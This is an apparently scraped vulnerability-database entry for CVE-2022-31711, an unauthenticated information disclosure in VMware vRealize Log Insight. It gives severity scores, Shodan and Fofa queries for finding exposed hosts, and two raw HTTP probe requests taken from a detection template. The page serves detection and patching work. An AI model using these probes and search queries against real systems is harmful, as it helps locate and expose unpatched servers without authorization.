🔙 목록으로 돌아가기

CVE-2022-31711: VMware vRealize Log Insight < v8.10.2 - Information Disclosure

TitleVMware vRealize Log Insight < v8.10.2 - Information Disclosure
AuthorDhiyaneshDK
SeverityMedium
ImpactAttackers can access sensitive session and application data, leading to potential information leakage and security breaches."
RemediationApply the latest security patches and updates provided by VMware to mitigate this vulnerability.
CVSS Score5.3
EPSS Score0.77486
CVE IDCVE-2022-31711
Shodan Queryhttp.title:"vrealize log insight"
Fofa Querytitle="vrealize log insight"
Tags cve cve2022 vmware exposure passive vkev vuln

🔍 Vulnerability Description

VMware vRealize Log Insight contains an Information Disclosure Vulnerability. A malicious actor can remotely collect sensitive session and application information without authentication.

🌐 HTTP Request

GET /i18n/component/JS?locale=en-US HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /api/v1/version HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/58.0.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31711.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31711.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A